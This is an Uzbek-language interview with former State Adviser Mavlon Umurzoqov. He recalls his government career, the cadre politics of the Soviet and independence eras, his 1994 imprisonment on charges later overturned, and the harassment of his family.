Mavlon Umurzoqov: “Siyosat oʻz saroyidan haydagani bilan ilm meni hech vaqt oʻzidan uzoqlashtirmadi”
• Vatanning “oltin xazina”si • Siyosatchiga qarshi ishlagan fitna va tuhmat “mashina”si… • Davlat maslahatchisidan siyosiy mahbusgacha… • Sobiq Davlat maslahatchisining topilmagan tillalari… • Xalq shoiridan yechib olingan…
• Vatanning “oltin xazina”si
• Siyosatchiga qarshi ishlagan fitna va tuhmat “mashina”si…
• Davlat maslahatchisidan siyosiy mahbusgacha…
• Sobiq Davlat maslahatchisining topilmagan tillalari…
• Xalq shoiridan yechib olingan taqinchoqlar….
Adolat haqida fikr yurita turib yozuvchilardan biri uni “dunyo ustidan oʻtguvchi dor”ga qiyoslagan. Unda yurgandan koʻra u haqda xayol surgan afzalroq deydi. Darhaqiqat, adolatsizlikka, haqsizlikka uchragan odam adolat haqida ana shunday oʻyga borishi tabiiy. Biz Birinchi Prezidentning sobiq Davlat maslahatchisi Mavlon Umurzoqov bilan uning hayot yoʻllari haqida suhbatlashar ekanmiz, tuhmat va fitnaning, nohaqlik va igʻvoning yoʻli baribir boshi berk koʻchada ekanligiga amin boʻldik. Marhamat, sizni suhbatdoshimiz bilan yuzma-yuz qoldiramiz.
— Mavlon aka, mana Vatanimiz Mustaqil boʻlganiga 29 yil toʻldi. Bu oʻz-oʻzidan boʻlmagan, albatta. Mustaqillik qabul qilingan pallalarda siz davlat mahkamasida nufuzli lavozimda ishlagansiz. Yangi davlat barpo etishning oʻzi boʻlmagan boʻlsa kerak?
— Mustaqillik afsonaviy tortiq sifatida osmondan tushmagan. Aslini olganda sobiq SSSR deb atalmish imperiya 1970 yillar oxiri 1980 yillar boshida siyosiy, iqtisodiy, maʼnaviy jihatdan inqirozga yuz tuta boshlagan edi. Oʻsha yillardagi turgʻunlik nafaqat iqtisodda, balki mafkurada, odamlar orasidagi munosabatda koʻrinardi. Eliga va vataniga emas, oʻz boshligʻiga sadoqati bois tanlangan kadrlarning xato va kamchiliklari urchigan va buning oqibatida KPSS degan “mashina” yurishdan charchagan edi. Shuning barobarida unga tobe mamlakatlar va aholining ham sabr kosasi toʻlgan bir palla edi.
“Qayta qurish” degani bilan uning aniq bir strategiyasi yoʻq, oshkoralik deb juda koʻp korxona va tashkilotlarni tartibdan chiqarib yuborgan Moskvaning boshqaruv qobiliyati allaqachon koma holatiga kelayotganligi aniq boʻlib qoldi. Bularning hammasi SSSRning parchalanishiga va mustaqillikka erishishga qulay vaziyat yaratgan edi. Natijada mamlakatimiz sobiq Ittifoq respublikalari orasida birinchi boʻlib, oʻz mustaqilligini eʼlon qildi va 1991 yil 1 sentyabr — Mustaqillik kuni deb eʼlon qilindi. Bu albatta, juda quvonchli tarixiy hodisa. Biroq ana shu lahzadan boshlab bizning, ayniqsa, davlat tepasida turgan har bir mutasaddilarning yelkasiga juda katta masʼuliyat yuklandi.
Biz bu davrda kabinetda oʻtirib ishlamaganmiz, xalq orasiga kirib borganmiz. Bu paytda qoʻyilgan ilk masala “Paxta ishi” masalasida nohaq qamalganlarni ozod qilish masalasi boʻldi.
1991 yilning dekabr oyida Namangan voqealari sodir etildi. Buni koʻpchilik yaxshi eslasa kerak. Tohir Yoʻldoshev degan kimsa olomonni toʻplab, ular nomidan Islom Karimov oldiga Oʻzbekistonni Islom jumhuriyati deb eʼlon qilish, diniy siyosat asosida davlatni boshqarish kabi oʻnlab talablarni qoʻydi. Oʻsha kuni aeroportda I.Karimovni kuzatar ekanmiz, Ismoil Joʻrabekov va men tinchlik oʻrnatilguncha bir muddat Namanganda qolishimiz haqida topshiriq oldik. Bu bir muddat bir yarim oydan oshishini oʻshanda ikkovimiz ham bilmagan edik. Bu vaqt mobaynida maktab, kollej, institut yoshlari bilan uchrashuvlar qilib, vaziyatni toʻgʻri baholovchilar sonining oshishiga erishdik. Tohir Yoʻldoshev va Juma Namangoniy esa oʻz harakatining kelajagini bilgach, xorijga qochib ketishdi. Boringki, Oʻsh, Fargʻona, Boʻka voqealarining har biri bizdan oqilona ish olib borishni talab qilardi. Mamlakat hayotidagi eng ogʻir, eng qaltis, eng tarixiy pallalarda ishlab, elimizga xizmatimiz singiganidan gʻururlanib ketamiz.
— Mamlakatimiz rivojiga hissa qoʻshgan siyosatchi, iqtisodchi olim sifatida bugungi ijtimoiy, iqtisodiy jarayonlarni qanday baholaysiz?
— Bugun odamzotning boshiga tushgan bu sinovli damlardan chiqish uchun har bir mamlakat oʻzicha yoʻl tutmoqda. Aholining ijtimoiy yordamga muhtoj qatlamiga alohida eʼtibor qaratilayotgani tahsinga sazovor. Vatanparvar, fidoyi va islohotchi Prezidentimiz Shavkat Mirziyoev pandemiya sharoitida xalqimizning manfaatlarini oʻylab, qator farmon va qarorlarga imzo chekdiki, buni quvonch bilan eʼtirof etaman. Kezi kelganda aytay, shunday ogʻir va sinovli kunlarda xalqimizning yordamga muhtoj qatlamiga ajratilgan mablagʻlar ayrim noinsof mulozimlar tomonidan talon-toroj qilindi. Shu yurtning bir fuqarosi sifatida bu xildagi munosabatdan yuragim qattiq ogʻridi.
Ijtimoiy-iqtisodiy tizim bilan bogʻliq ulugʻvor maqsadlar sari dadil qadam tashlanyapti, lekin ularning toʻla-toʻkis amalga oshishi yengil kechayotgani yoʻq. Boshqaruv tizimida faoliyat olib borayotgan ayrim mulozimlarning noʻnoqligi esa, bugungi tezkor va globallashuv jarayonlariga moslasha olmayotgani, korruptsiya botqogʻidan qutula olmayotgani, fidoyilik va vatanparvarlik tuygʻularidan yiroqligi mamlakatda boshlangan jiddiy islohotlarni qiyinlashtirmoqda. Yurtda boshlangan yangicha yondashuv bu xildagi mulozimlarga murosasizlik qilib, zudlik bilan ulardan voz kechish kerakligini koʻrsatmoqda. Chunki, Prezident Shavkat Mirziyoyev ilgari surayotgan «Xalq davlat idoralariga emas, davlat idoralari xalqqa xizmat qilishi kerak», «Fuqarolar emas, hujjatlar harakatlanadi», «Odamlar ertaga emas, uzoq kelajakda emas, bugun yaxshi yashashni istaydi», degan mutlaqo yangicha tamoyillari odamlar qalbida umid va ishonch tuygʻularini uygʻotdi.
Shavkat Mirziyoyev davri xalqimiz hayotida uygʻonish va islohotlar davri boʻlib tarix sahifalariga kirishi uchun boshlangan keng koʻlamli islohotlar oʻzining samarasini berishi kerak. Salmoqli va xalqimiz kutayotgan farovon hayotni barpo etish xohlaymizmi, yoʻqmi, baribir yetuk kadrlar faoliyati bilan bevosita bogʻliq. Vaqt va umr esa kutib turmaydi. Shiddat bilan oʻtib bormoqda. Shunday boʻlgach, fidoyi, jasoratli, vatan va xalqimiz manfaatlarini oʻylaydigan odamlarning masʼul lavozimlarda faoliyat olib borishlariga barchamiz birdek harakat qilishimiz bugungi muhim vazifamizga aylanmogʻi lozim. Tarixdan maʼlum, dono podshohlarning yonida donishmand vazirlar, bilimdon allomalar, yuksak iqtidor egalari qanot boʻlgan. Axir Husayn Boyqaroga hazrat Navoiyni qanchalik yomonlashmasin, eng murakkab vaziyatda sulton Navoiyga suyangan. Saljuqiy hukmdorlarga qirq yil bosh vazirlik maqomida faoliyat olib borgan dono vazir Nizomulmulk aqlli va donishmandligi tufayli mamlakatning ishonch togʻiga aylangan. Demak, noyob isteʼdod egalari Vatanning “Oltin xazina»si sifatida islohotchi va tolmas Prezidentning yonida boʻlishlari boshqaruvda adolat va haqiqatning qaror topishini taʼminlaydi, deb oʻylayman. Ana oʻshanda mamlakat gullab, yashnaydi. Ana oʻshanda odamlarimiz ish izlab, turli mamlakatlarda sarsonu sargardon kezmaydilar.
— Davlat boshqaruvi tizimida ishlagan davringiz katta bir tarix, albatta. Lekin bu koʻpchilik uchun qiziq ekanligi ayon. Ayting-chi, bu tizimga ishga kelishingizga nimalar sabab boʻlgan, katta lavozimda ishlashdan, siyosat “oʻyinlari”dan qoʻrqmaganmisiz?
— Har bir odamning kelajagiga, uning shakllanishiga oilaviy muhit, tasodifiy uchrashuvlar yoki hodisalar sabab boʻladi. Bu jarayon chetdan qaraganda tabiiy holday koʻrinadi. Mening iqtisodchi boʻlishimga paxta terimi paytida uyimizda ikki oy yashagan Toshkent Davlat xalq xoʻjaligi institutining besh nafar talaba — hasharchilari sabab boʻlgan edi. Ularning odobi, kamtarligi va oʻzaro munosabatlariga havas qilganman. Mana shu havas meni Toshkent Davlat xalq xoʻjaligi institutiga yetaklab kelgan. 1970 yilda institutni imtiyozli diplom bilan tamomlaganimdan soʻng meni rektorimiz M.Qoriev tashabbusi bilan institutda olib qolishdi. Keyinroq Moskva Davlat moliya institutiga ish oʻrganuvchi — tadqiqotchi boʻlib bordim hamda u yerda aspiranturaga qabul qilindim.
Ha, umr oqar daryo deganlari rost ekan, koʻz ochib yumguncha oʻtib ketdi. U yerda asosiy vaqtim Lenin nomidagi oʻsha mashhur kutubxonada kechardi. Haftada ikki kun talabalarga amaliyotdan mashgʻulot oʻtardim. Har bayramda Qizil maydonga piyoda yoʻlga tushardik. Moskvada dissertatsiyamni himoya qilgandan keyin Toshkentga qaytib yana institutda dars bera boshladim. Institut oʻqituvchilari yoshlarga maʼruzalar oʻqish uchun viloyatlarga chiqardik. Bu guruhlarga oʻsha vaqtlar Oʻzbekiston Kompartiyasi Markaziy qoʻmitasi va Komsomol tashkiloti masʼul xodimlari rahbarlik qilgan. Ana shunday safarlardan soʻng meni Komsomolning markaziy qoʻmitasiga ishga taklif qilishdi. U yerda ozroq ishlab, siyosat havosida ozmi-koʻpmi toblanishga toʻgʻri keldi.
1985 yilda meni Markazqoʻmga chaqirib, Ishlar boshqarmasining moliya sektori mudirligiga ishga taklif etishdi. Shu sabab, Moskva — KPSS Markaziy komitetiga suhbatga bordim. KPSS MK apparatining Oʻzbekiston boʻyicha kuratori N.Girko, ishlar boshqaruvchisi Ye.Krugina, Markazqoʻm kotiblari Biryukova va Dolgixlarning suhbatidan oʻtgachgina ushbu lavozimga tayinlanganman.
— Endi sir boʻlmasa kerak, oʻsha davrdagi “Markazqoʻm”da siz ishlagan sektor qanday vazifani bajargan?
— Bu sektor asosan partiyaning byudjeti bilan shugʻullangan. Oʻsha yillar Oʻzbekistonda partiyaning moliyaviy ahvoli koʻpgina boshqa ittifoqdosh respublikalarga qaraganda ancha yaxshi boʻlgan. Respublikadan to eng quyi boʻgʻinlargacha xodimlarning soni, maoshlarigacha “Markaz”dan belgilanardi. Hatto partiya qoʻmitalari kotiblariga biriktirilgan avtomashinalarning bir yilda qancha kilometr yurishi, qachon shinalari almashishi muddati va tartiblari ham KPSS Markaziy Komiteti tomonidan tasdiqlanardi. Bu esa “Markaz”ning quyi boʻgʻinlariga ishonchsizligidan dalolat berardi. Oʻz navbatida partiya xodimlari orasida norozilik kayfiyatining tugʻilishiga sabab boʻlgan.
— Kadrlar siyosati qanday olib borilgan. Oʻsha paytda mamlakat qay darajada oʻzining yetuk va salohiyatli kadrlariga ega edi?
— Aytishim kerakki, sovet davridagi kadrlar siyosatini yuz foiz qoralab boʻlmaydi. Kadrlarni tanlashda asosan Respublika, viloyat, shahar va tuman darajasida kadrlar zaxirasi hujjatlariga asoslanardi. Viloyat rahbarlari va muovinlari “Moskva tasdigʻi”dan oʻtishi shart edi va shu boisdan rahbar deganlari Moskvaning koʻnglini ovlash bilan band boʻlgan. Rus tilini bilmagan, tashabbuskor ilmiy kadrlarning rahbarlik lavozimiga oʻtishi oʻta murakkab hol edi. Ayniqsa, Sharof Rashidov oʻlimidan soʻng kadrlar siyosati butunlay “Markaz” qoʻliga oʻtgan. Oʻzbekiston Respublikasi Kompartiyasi markazqoʻmining olti nafar kotibidan uch nafari rus millatiga mansub boʻlgan. Tez-tez “Markaz”dan “desantchi” — rahbarlar tashlanardi. Bundan koʻzlangan maqsad ayon — Oʻzbekistonda “tartib oʻrnatish”, shiori ostida oʻzbek xalqining gʻururini sindirish, oʻzlariga yanada kuchliroq tobe qilish, elni el bilmas olomonga aylantirish edi.
— Maʼlumki, siz ishlagan davrlarda yuqori lavozimlarga kurash zimdan davom etgan. Manfaatlar, lavozimlar toʻqnashuvi oralab toʻgʻri kadr tanlay bilish juda murakkab kechgan boʻlsa kerak?
— Albatta. Bu yerda ikki xil manfaatlar toʻqnashuvi yuz bergan: yurt, mamlakat manfaati uchun va oʻz urugʻ-aymogʻi-yu oshna-ogʻaynisi uchun xizmat qilguvchilar manfaatlari. Boʻsh emas, munosib oʻringa munosib kadrlarni tanlash va tayinlash ajdaho ogʻzidan olov keltirishday xatarli edi. Chunki tepangizda har qanday fitna sizga qarshi qilich qayrab turganligini his qilib turish mumkin edi u paytlarda.
Oʻsha paytda Oʻzbekiston teleradiokompaniyasi raisi oʻrinbosari lavozimiga I.Karimovning taklifi bilan yurtimizdagi isteʼdodli jurnalistlardan birining nomzodini tayinlash toʻgʻrisida farmoyish tayyorlash buyurildi. Ertasi kuni ushbu farmoyish loyihasini tayyorlab olib kirsam, sobiq prezident bu masalaga keyinroq qaytamiz, deb bu ishni orqaga surdi. Xuddi shuningdek, Bosh vazir oʻrinbosari lavozimiga Toshkent shahridagi tuman hokimlaridan birining nomzodini tavsiya qilgan edik. Prezident rozilik berdi, biroq bir kun oʻtib bu masala ham toʻxtab qoldi. Bu ham oʻsha atrofdagi fitnachilarning, oshna-ogʻaynibozlarning ishi boʻlgan. Ular iloji boricha halol, malakali kadrlar ustidan turli igʻvo va fitnalarni uyushtirib, imkoni boricha ulardan tezroq qutulishga bel bogʻlagan edilar. Nafaqat men, balki xalq va millat taraqqiyoti yoʻlida astoydil mehnat qilib, Prezidentning nazariga tushgan har qanday odam saroydagi bir uyum fitnachilarning bosh dushmaniga aylangan.
— Oʻsha yillarda kadr tanlashda maʼlum bir meʼyorlarga amal qilinganmi?
— Mustaqillik eʼlon qilingandan soʻng, kadrlar borasida “Markaz tasdigʻi” kabi sarqitlar va ish uslublariga barham berildi. Yangicha tuzum va uning tuzilmasida sezilarli oʻzgarishlar qilish uchun yangicha ruh va yangicha kuch bilan ishlaydigan kadrlarni topish ustida ish olib borildi. Aytganimday, kadrlarni topish, tanlash, ularni munosib oʻrinlarga qoʻyish juda qaltis va ogʻriqli masalalardan biri edi.
Chunonchi, mahalliychilik, oshna-ogʻaynigarchilik oʻsha yillar kadrlar siyosati kun tartibidagi asosiy masala boʻlgan. Oʻshanda bunga barham berishning yangi usulini oʻylab topdik. Unga koʻra mamlakat markaziy organlarida qoʻmitalardan tortib, vazirliklargacha hamma viloyatlardan vakillar boʻlishi, yaʼni maʼlum kvotaga boʻysunish kerak edi. Kvota oʻsha viloyat aholisi mamlakat aholisining necha foizini tashkil etishiga qarab belgilanardi. Kadr tanlashning ushbu usuli ancha-muncha muvaffaqiyatli kechgan edi.
Prezident devonida ishlab yurganimda va hozir ham rahbar atrofida mayda gaplar aylanishi meni koʻp oʻyga toldiradi. Menimcha, bizda shaxsga sigʻinish emas, mansabga sigʻinish unsurlari har doim ustunlik qilmoqda. Har bir davrda ham shikoyatchilar boʻlgan. Xoʻsh, ular nimadan paydo boʻladi: albatta, oʻzi duch kelgan muammoning quyi hokimiyatlarda adolatli hal etilmaganidan. Chunki har qanday shikoyat zamirida ozmi-koʻpmi adolat istagi yotadi. Qayerdaki adolat boʻlmasa, oʻsha fuqaro rahbar eshigidan norozi boʻlib chiqadi. Natijada davlat siyosatiga nisbatan ishonchsizlik paydo boʻladi.
Shuningdek, har bir rahbar oʻz sohasini, oʻz kasbini romantik darajada yaxshi koʻrishi kerak. Menimcha, hatto siyosatchi ham romantikaga moyil boʻlmogʻi kerak. Buyuk sanʼatkor Rastrapovichning buyukligi nimada edi? Uning buyukligi “Tugʻilganidan oʻlimiga qadar uning uchun faqatgina musiqa borligidadir”. Rahbar uchun ham uning kreslosi emas, ishi mazmunga aylanmogʻi kerak.
Yana qaytarib aytamanki, kadrlar siyosatida halollik va adolat bosh mezondir. Baʼzan ommaviy axborot vositalari orqali falon hokim faloncha ming dollar olibdi, yoki pismadon hokim oʻz viloyatidagi bir oilaning uyini oʻzi bosh boʻlib buzdirib tashlabdi, deganga oʻxshash xabarlarni oʻqib qolaman. Mana shu va shu kabi holatlar bois, allaqanday kaltabin rahbarlarning egri siyosati bilan hukumat ham, davlat ham uyatga qoladi, yuzi shuvut boʻladi.
— Oʻtgan yillar davomida siyosatchilardan kimlarning shaxsi va amalidagi uygʻunlikni qadrlaysiz? Sizningcha Oʻzbekiston oʻzining professional siyosatchilariga egami?
— Avvalo, men Sharof Rashidov shaxsiga va faoliyatiga cheksiz ehtirom bilan qarayman. Sharof Rashidov respublikamizni chorak asr oqilona boshqargan davlat arbobi edi. U kishining mehridan, gʻamxoʻrligidan bahramand boʻlgan odamlar juda koʻplab topiladi. Sharof Rashidov davlatni boshqargan yillar mamlakatning gullagan davri edi. Oʻsha davrda respublika iqtisodiyotini har tomonlama rivojlantirish oʻz-oʻzidan amalga oshmagan. Uning zamirida katta kurashlar, sobiq “Markaz”ning korchalonlari bilan til topishishlar, hatto bir tonna tsement olish uchun ularning roziligini olish oson kechmagan. Mamlakat xalq xoʻjaligi tarmoqlarining har biri bevosita u kishining rahbarligida rivojlangan. Endi u kishining nomi qoralanishlari-yu uni oqlash uchun qilingan harakatlarni aytay desam, buning oʻzi alohida bir mavzu.
Shuningdek, yana bir iqtidorli, talabchan siyosatchi bu Ismoil Hakimovich Joʻrabekov, men uni 1985 yildan buyon bilaman. Bu odam bilan ish yuzasidan respublikamizning viloyat, tuman, kolxoz va sovxozlarigacha aylanib chiqqanman. Hokimlar, kolxoz, hatto brigada boshliqlarining ismigacha bilardi. Xalq hayotiga singib ketmagan odam bunday yaqinlikni his qilmasdi, albatta. Umrini, joʻshqin faoliyati va salohiyatini, qishloq va suv xoʻjaligini rivojlantirishga bagʻishladi. U mamlakatimizning har bir qarich yerini qadamma-qadam aylanib chiqqan. Bosh vazir oʻrinbosari, Prezidentning Davlat maslahatchisi lavozimlarida turib ham oddiy xalqning “oʻz odami”ga aylanib ketgan edi. Uning qatʼiy irodasi, siyosiy bosiqligi sabab mamlakatimiz juda koʻp tahlikali vaziyatlardan eson-omon oʻtgan. Bu kabi kadrlar kam emasdi. B.Rahimov, N.Xudoyberdiyev, M.Musoxonov, O.Salimov, O.Sodiqov, A.Toʻrayev, S.Sirojiddinov kabi yuzlab kadrlar el olqishiga sazovor boʻlganlar. Men bu tarixiy shaxslarni hamda bugun mamlakatimizda muhim islohotlarni oʻtkazayotgan Shavkat Miromonovich Mirziyoyevni haqli ravishda yurtning asl farzandlari va oqil siyosatchilari deb bilaman.
— Ruslarda bir mashhur maqol bor: “Vek jivi, vek uchis” deyishadi. Oʻzimizda esa bundan ham kuchli gap bor: “Beshikdan to qabrgacha ilm izla”. Shunday ekan, hukumat tarkibida ishlagan yillaringizni bugun oʻzingiz qanday baholaysiz?
— Har qanday odam oʻzi qilgan ishlaridan koʻnglim toʻldi, qotirib bajardim, degan fikrlardan uzoq boʻlmogʻi kerak. Shu ishni sening oʻrningda boshqa odam bajarganida balki undan ham yaxshiroq natijaga erishgan boʻlarmidi…
Endi oʻzim bajargan ishlarga keladigan boʻlsam, ulardan koʻnglim toʻq boʻlganidan toʻlmagan hollar koʻp boʻlgan. Nega, deb soʻrarsiz? Qon-qonimizga singib ketgan odat bor: bir-birimizga toʻgʻri soʻzni ayta olmaymiz, yuz-xotir qilamiz, andishaga berilamiz. Baʼzan esa qoʻrquv vijdonimiz ustidan ham gʻolib keladi. Aksar hollarda rahbarlar tanqid qilgan odamning fikrini oʻrganib, xulosa chiqarish oʻrniga ulardan qasd olish payiga tushadilar. Shunday ekan, huquqiy davlat qurish yoʻlidan borayotgan mamlakatda fuqarolarning shaxsiy fikri qayerda qoladi?!
— Mamlakat va millat taqdiri uchun tinim bilmay ishlab, yana nomingizga “dogʻ” tushib, tuhmat bilan ishdan chetlatilish bu chidash ogʻir boʻlgan azobli holat, albatta. Ishdan chetlatilganingizda ehtimol, adolatli boʻlishga adolatning, haqiqatni aytishga haqiqatning qurbi yetmagan boʻlishi mumkin. Bugun hammasini ochiqlasa boʻlar, chunki Oliy Sud Sizning aybsiz ekanligingizni isbotladi. Ayting-chi, agar mumkin boʻlsa, oʻshanda nima boʻlgan edi?
— Albatta bu azobli, qaygʻuli hol, mening rahbarligimda ishlayotgan masʼul xodimning oʻz boshligʻi ustidan shikoyat yozishi kechirib boʻlmas holat edi. Biroq bu shikoyatning, toʻgʻrirogʻi, fitnaning tashkilotchilari boshqalar boʻlgan. Bu xatda goʻyoki mening mahalliychilikka, oshna-ogʻaynigarchilikka berilganim bitilgan edi. Oddiy referentlikdan bir yil ichida oʻrinbosarlikkacha koʻtarilgan kimsaga “ustoz”ini sotish evaziga katta amallarni vaʼda berishgan. Biroq niyatlari amalga oshgach, fitna tashkilotchilari uni keraksiz buyumday chetga uloqtirishgan.
Shundan soʻng oʻz vazifamdan ozod etilib, Sirdaryo viloyat hokimiga oʻrinbosar etib tayinlandim. Biroq bu bilan fitnachilar tinchimadi. Goʻyoki sobiq davlat maslahatchisi kelgusida davlat rahbari vazifasini egallashga intilmoqda, degan uydirmalarni tarqataverishgan. Ana shu sabab mening ishimni mahkamaga tortishga koʻrsatma berilgan. Sud hukmida esa hatto chet eldan sovgʻa sifatida olib kelingan va qiymati 50 dollarga baholangan ikki kilogramm konfet ham pora sifatida koʻrsatilgan edi.(Oradan 22 yil oʻtib ushbu hukm Oliy sudda qayta koʻrilganida bu ayblov taroziga qoʻyishga ham yaramadi). Jinoiy dalillar yetarli boʻlmagani sababli yangi, turli xil qabihliklarni oʻylab topishardi. Katta boylik orttirgan boʻlishi mumkin degan taxmin bilan Boyovut tumanida yashovchi aka-ukalarim va qarindoshlarimning uylari ham tintuv qilindi. Oltin bor joyda chirillab ovoz chiqaradigan uskuna bilan boylik axtarishdi. Uskuna har chirillab ovoz chiqqanida xursand boʻlib qarashsa, afsuski, u oltin emas, tuproq ostida qolib ketgan konserva qutisi yoki zanglagan temir boʻlaklari boʻlib chiqqan ekan.
— Axir, oʻsha paytda Oliy Majlis deputati boʻlgansiz-ku. Nahotki Qonunchilik palatasi oʻz deputatini himoya qila olmagan boʻlsa?
— Aynan shunday. Oliy Majlis deputati, qolaversa, hukumat tarkibidagi siyosatchi edim. Biroq hammaning tiliga qulf osilgan edi. 1994 yil 4 avgustda jinoiy javobgarlikka tortildim va hibsga olindim. Na Oliy Majlis, na Xalq demokratik partiyasi oʻz aʼzosining taqdiri bilan qiziqqani yoʻq. Bilasizmi, sen Adolat deb tikiladigan hukumatning oʻzi boshingga uyum-uyum igʻvoni agʻdarib oʻtirsa, chidab boʻlmas edi bunga. Hukm oʻqilib, qamoqxonaga joʻnatilganimdan soʻng ham kuzatuv va bosimlar muntazam davom etaverdi. Bir zonaga yuborishadi, biroz vaqt oʻtgandan keyin turmalar boshqarmasidan koʻrsatma keladi: “Falon saylov yaqinlashmoqda. Bu zonada kontingent juda koʻp, “Falonchiyev” saylovga yomon taʼsir koʻrsatishi mumkin”. Shundan soʻng meni yana boshqa zonaga koʻchirishadi. Qiziq, turmada oʻtirib, maxbus holimda saylovlarga qanday qilib “yomon taʼsir” oʻtkazishim mumkin edi? Koʻryapsizmi, qanchalar ayanchli, tuturuqsiz va kulguli boʻlgan bu xatti-harakatlar. Amnistiya vaqti yaqinlashganda esa arzimagan xatolarni topishardi, maqsad — amnistiyaga ilintirmaslik boʻlgan.
Birinchi prezident Islom Karimovga xat yozganimdan soʻng, uning farmoyishi bilan 1996 yil 9 avgustda men ozod etildim. Biroq Toshkentga — oilam bagʻriga emas, Sirdaryoga — ukalarim yashayotgan qishloqqa borishim kerak ekan. Qishloqda uy-joyim yoʻq, shunga qaramasdan, uysiz qishloqqa roʻyxatga olingan edim. Nima uchundir, oʻz jonajon uyimdan roʻyxatdan oʻchirilgan boʻlganman. Uzoq yillar qoʻlimga pasportim ham berilgani yoʻq. Faqat 2015 yil, 21 oktyabrda Toshkentga — oʻz uyimga roʻyxatga olindim.
— Bu kabi dahshat oʻpqonlariga har kuni ming marta yiqilib, uning ogʻriqlarini yengib yashash noziktaʼb shoiramiz Halima Xudoyberdiyevaga ham oson boʻlmagan boʻlsa kerak?
— Halima opangiz oʻzining oxirgi kitoblaridan birini “Osoyishta sham” deb atadi va oʻsha kitobdagi bir turkum sheʼrlar “Dahshatli yoz” deb nomlangan. Bu bejizga emasdi, albatta. Chunki oʻsha yoz kunlarida mening, oilamizning, qarindosh-urugʻlarimning boshiga hayotimizdagi eng ayanchli kunlar tushgan edi. Halimaning oʻzi oʻsha kunlarni shunday izohlagan edi: “Nega dahshatli yoz?.. Negaki oʻsha yozda oilamizning qahraton sovuqlaridan battar kunlari boshlangan edi… Biz yozda goh izgʻirindan, sovuq nigohlar, sovuq xabarlardan muzlaganmiz, goh tuhmat qozonlarida qovrilganmiz. Umr yoʻldoshim — bolalarimning otasi qamoqda, bolalarim azobda, roʻzgʻorim parishon… Oʻzim qamoq eshiklarida…”
Halimani, oʻgʻillarimni, qarindosh-urugʻlarim va yaqin doʻstlarimizni doimiy ravishda surishtiruvu soʻroqlarga chaqirib turishdi. Uyni tintuv qilib, oilamiz aʼzolariga tegishli kiyim-kechak, mol-mulk bormi — hammasini xatlov qilib olib ketishgan. Hatto turmush oʻrtogʻimning taqinchoqlarigacha yechib olishgan. Yashayotgan uyimiz xususiylashtirilganiga qaramasdan musodara qilingan. Ushbu zulm ortidan ikki farzandimiz ham jinoiy javobgarlikka tortildi. Ular ham “sudlangan” degan tamgʻani olishi kerak boʻlgan, shekilli. Koʻp oʻtmay esa ikkinchi oʻgʻlim vafot etdi. Bunday voqealardan soʻng Halima opangizning yuragidan oʻtgan haddan tashqari qaygʻuli onlarni Siz bir ijodkor, qolaversa ona sifatida his qilsangiz kerak. Qamoqdan chiqqandan soʻng Halima opangiz ham, men ham turli cheklovlar va kuzatuvlardan forigʻ boʻlmadik. Radio, televideniye, matbuot va nashriyotlar eshiklarida biz uchun katta qulflar osigʻlik turardi.
Shu oʻrinda yana bir voqeani gapirib bersam… 2011 yilda Halima tugʻilib oʻsgan Boyovutning “Taraqqiyot” fermer xoʻjaligida uchrashuv uyushtiriladi. Unda Halima bilan birga Azim Suyun, Umrzoq Oʻljaboyev, Qozoqboy Yoʻldoshev kabi shoir va olimlar ishtirok etishgan. Oʻsha uchrashuvdan esdalik sifatida olingan fotosurat muzey devoriga ilib qoʻyilgan ekan. Oʻsha birgina fotosuratni deb maktab direktori surishtiruv va soʻroqqa tortilgan. Men toʻla oqlanganimdan soʻnggina suratni qaytarib joyiga qoʻyishgan. Bu ogʻir damlar kayfiyati shoiraning sheʼrlariga koʻchgandi:
Kecha hayotga toj biz koʻplarimiz,
Bugun shu hayotning magʻlublarimiz…
Kecha oyat misol koʻzga surtilgan
Bugun oʻqilmadi… maktublarimiz.
— Oʻshanda Siz kabi juda koʻplab millat oydinlarining boshi turli tuhmatlar ostida qolgan. Bunga tuhmatchi va fitnakorlar sabab boʻlgan ekan-da…
— Men kabi necha oʻnlab oʻz ishini sevib ishlaydigan odamlarga qilingan igʻvo va fitnalar sabab kadrlar siyosati ogʻir ahvolga tushib qolgan edi. Adolatli, toʻgʻrisoʻz va tashabbuskor kadrlar yo yurtdan badargʻa qilindi yoki qamaldi. Hatto oʻzining ilmi bilan butun Islom dunyosida dong taratgan shayx Muhammad Sodiq Muhammad Yusuf ham maʼlum yillar yurtimizni tark etishga majbur boʻlgan edi. Aytishadi-ku: “Agar podsho donishmand boʻlsa ham uning atrofini johil va nodonlar egallasa, podshoning donoligiga putur yetadi”. Eng afsuslanarlisi, davlatchilik va boshqaruv bor ekan, uning atrofida har doim fitnachi va igʻvogarlar boʻlgan. Bu fisqu fasodlarga aldanmagan hukmdorlargina adolatli jamiyat barpo eta olganlar. Shunday ekan, bugun mamlakatda adolatli tizimni toʻliq amalga oshirish nafaqat Prezidentning, balki barchamizning vazifamizga aylanmogʻi kerak. Muhtaram Prezidentimiz Shavkat Mirziyoyevning “Xalqimiz ertaga emas, uzoq kelajakda emas, balki bugun baxtli yashashi kerak” degan ulugʻ niyati toʻla-toʻkis hayotga koʻchmogʻi lozim.
Axir 2018 yilda men bilan birga men kabi minglab nohaq jabrlanganlar, qoralanganlar oqlandi-ku! Oila aʼzolaring, qarindosh-urugʻlaring oldida yuzing yorugʻ boʻlishdan ham ulugʻ neʼmat bormi? El oldida-chi? Mana mening muhtaram Prezidentimiz Shavkat Miromonovich olib borayotgan siyosatga mehrim va xayrixohliklarim nimadan?! Toʻgʻrisi, bu kabi siyosiy donishmandlik qoshida hayratlanmay boʻladimi, axir!
— Millat taqdiri haqida oʻylaganingizda nimalar haqida xayolga berilasiz? Xalqni rozi qilish uchun sizningcha qanday ishlash va qanday yashash kerak?
— Menimcha, muammolardan biri bu — fuqarolarni qabul qilish masalasidir. Chunki rahbarlar bilan xalq orasida masofaning kattaligi, ular orasidagi jar mana shu muammodan kelib chiqadi. Tanishlarimdan biri oʻz shaxsiy ishi boʻyicha mutasaddi rahbarlarga 300 martadan ortiq xat yozganini aytadi. Nahotki, 300 ta xatdan birortasiga javob ololmasa? Aksariyat rahbarlar aholini qabul qilishdan qochadilar. Xoʻsh, nega? Mana yuqori tashkilotlar bilan bogʻliq yuzlab savollar javobsiz qolib ketmoqda. Amerikaning sobiq prezidentlaridan Ruzvelt haftada ikki marta jurnalistlar, sportchilar va noshirlar bilan suhbat oʻtkazgan ekan. Axir xalqning dardu tashvishlarini koʻtarib yuradigan odamlar oʻshalar-da.
